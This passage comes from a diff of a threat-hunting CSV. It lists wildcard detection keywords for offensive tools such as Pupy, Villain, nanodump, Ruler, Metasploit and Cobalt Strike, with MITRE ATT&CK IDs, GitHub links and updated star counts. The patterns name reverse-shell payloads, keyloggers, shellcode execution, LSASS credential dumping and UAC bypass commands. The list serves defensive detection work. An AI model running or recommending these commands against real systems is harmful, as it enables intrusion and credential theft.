tools","https://github.com/sfewer-r7/CVE-2023-34362","1","0","N/A","N/A","1","62","24","2023-06-13T08:46:03Z","2023-06-12T12:56:12Z" -"*ruby_nntpd_cmd_exec*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8794","2027","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" -"*ruby_no_sh_reverse_tcp.py*","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3252","534","2023-08-08T06:24:24Z","2022-10-25T22:02:59Z" -"*ruby_reverse_tcp.py*","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3252","534","2023-08-08T06:24:24Z","2022-10-25T22:02:59Z" +"*ruby_nntpd_cmd_exec*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*ruby_no_sh_reverse_tcp.py*","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3255","534","2023-08-08T06:24:24Z","2022-10-25T22:02:59Z" +"*ruby_reverse_tcp.py*","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3255","534","2023-08-08T06:24:24Z","2022-10-25T22:02:59Z" "*Rudrastra-main.zip*","offensive_tool_keyword","Rudrastra","Make a Fake wireless access point aka Evil Twin","T1491 - T1090.004 - T1557.001","TA0040 - TA0011 - TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/SxNade/Rudrastra","1","1","N/A","8","1","46","21","2023-04-22T15:10:42Z","2020-11-05T09:38:15Z" "*ruler * abk dump -o *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*ruler -k -d * brute --users *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*ruler-linux64*","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1102.001 - T1201.001 - T1570.002","TA0006","N/A","N/A","Exploitation tools","https://github.com/sensepost/ruler","1","1","N/A","N/A","10","1991","353","2021-02-19T09:28:07Z","2016-08-18T15:05:13Z" -"*ruler-linux86*","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1102.001 - T1201.001 - T1570.002","TA0006","N/A","N/A","Exploitation tools","https://github.com/sensepost/ruler","1","1","N/A","N/A","10","1991","353","2021-02-19T09:28:07Z","2016-08-18T15:05:13Z" -"*ruler-osx64*","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1102.001 - T1201.001 - T1570.002","TA0006","N/A","N/A","Exploitation tools","https://github.com/sensepost/ruler","1","1","N/A","N/A","10","1991","353","2021-02-19T09:28:07Z","2016-08-18T15:05:13Z" -"*ruler-win64.exe*","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1102.001 - T1201.001 - T1570.002","TA0006","N/A","N/A","Exploitation tools","https://github.com/sensepost/ruler","1","1","N/A","N/A","10","1991","353","2021-02-19T09:28:07Z","2016-08-18T15:05:13Z" -"*ruler-win86.exe*","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1102.001 - T1201.001 - T1570.002","TA0006","N/A","N/A","Exploitation tools","https://github.com/sensepost/ruler","1","1","N/A","N/A","10","1991","353","2021-02-19T09:28:07Z","2016-08-18T15:05:13Z" -"*rules/d3ad0ne.rule*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*run * pyshell*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" -"*run android_cam *","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" -"*run --bg shell_exec*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*ruler-linux64*","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1102.001 - T1201.001 - T1570.002","TA0006","N/A","N/A","Exploitation tools","https://github.com/sensepost/ruler","1","1","N/A","N/A","10","1994","353","2021-02-19T09:28:07Z","2016-08-18T15:05:13Z" +"*ruler-linux86*","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1102.001 - T1201.001 - T1570.002","TA0006","N/A","N/A","Exploitation tools","https://github.com/sensepost/ruler","1","1","N/A","N/A","10","1994","353","2021-02-19T09:28:07Z","2016-08-18T15:05:13Z" +"*ruler-osx64*","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1102.001 - T1201.001 - T1570.002","TA0006","N/A","N/A","Exploitation tools","https://github.com/sensepost/ruler","1","1","N/A","N/A","10","1994","353","2021-02-19T09:28:07Z","2016-08-18T15:05:13Z" +"*ruler-win64.exe*","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1102.001 - T1201.001 - T1570.002","TA0006","N/A","N/A","Exploitation tools","https://github.com/sensepost/ruler","1","1","N/A","N/A","10","1994","353","2021-02-19T09:28:07Z","2016-08-18T15:05:13Z" +"*ruler-win86.exe*","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1102.001 - T1201.001 - T1570.002","TA0006","N/A","N/A","Exploitation tools","https://github.com/sensepost/ruler","1","1","N/A","N/A","10","1994","353","2021-02-19T09:28:07Z","2016-08-18T15:05:13Z" +"*rules/d3ad0ne.rule*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*run * pyshell*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*run android_cam *","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*run --bg shell_exec*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" "*run -Executable *.exe*","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","0","N/A","10","10","401","83","2023-08-17T14:46:04Z","2020-11-09T08:05:16Z" -"*run interactive_shell*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" -"*run keylogger*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" -"*run memory_exec *.*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" -"*run mouselogger*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*run interactive_shell*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*run keylogger*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*run memory_exec *.*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*run mouselogger*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" "*run post/windows/gather/checkvm*","offensive_tool_keyword","metasploit","Metasploit Callback Automation:Use AutoRunScript to run commands on a reverse shell callback","T1059 - T1064 - T1029","TA0002 - TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","0","N/A","N/A","9","890","121","2023-10-03T19:54:40Z","2021-08-16T17:34:25Z" "*run post/windows/manage/killfw*","offensive_tool_keyword","metasploit","Metasploit Callback Automation:Use AutoRunScript to run commands on a reverse shell callback","T1059 - T1064 - T1029","TA0002 - TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","0","N/A","N/A","9","890","121","2023-10-03T19:54:40Z","2021-08-16T17:34:25Z" "*run post/windows/manage/migrate*","offensive_tool_keyword","metasploit","Metasploit Callback Automation:Use AutoRunScript to run commands on a reverse shell callback","T1059 - T1064 - T1029","TA0002 - TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","0","N/A","N/A","9","890","121","2023-10-03T19:54:40Z","2021-08-16T17:34:25Z" -"*run pyexec *","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" -"*run shell_exec *","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" -"*run shellcode_exec*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" -"*Run the krbscm method for SYSTEM shell*","offensive_tool_keyword","S4UTomato","Escalate Service Account To LocalSystem via Kerberos","T1558 - T1558.002 - T1548.002 - T1078 - T1078.004","TA0006 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/S4UTomato","1","0","N/A","10","4","315","58","2023-09-14T08:53:19Z","2023-07-30T11:51:57Z" +"*run pyexec *","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*run shell_exec *","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*run shellcode_exec*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*Run the krbscm method for SYSTEM shell*","offensive_tool_keyword","S4UTomato","Escalate Service Account To LocalSystem via Kerberos","T1558 - T1558.002 - T1548.002 - T1078 - T1078.004","TA0006 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/S4UTomato","1","0","N/A","10","4","316","58","2023-09-14T08:53:19Z","2023-07-30T11:51:57Z" "*run thief:latest*","offensive_tool_keyword","SeeYouCM-Thief","Simple tool to automatically download and parse configuration files from Cisco phone systems searching for SSH credentials","T1110.001 - T1005 - T1071.001","TA0001 - TA0011 - TA0005","N/A","N/A","Discovery","https://github.com/trustedsec/SeeYouCM-Thief","1","0","N/A","9","2","149","30","2023-05-11T01:04:36Z","2022-01-14T20:12:25Z" "*run_ppl_dump_exploit*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" "*run_ppl_medic_exploit*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" -"*run_server.bat","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6330","762","2023-10-03T21:06:53Z","2015-08-30T07:22:51Z" +"*run_server.bat","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6332","762","2023-10-04T21:10:48Z","2015-08-30T07:22:51Z" "*runasadmin uac-cmstplua*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*runasadmin uac-token-duplication*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - 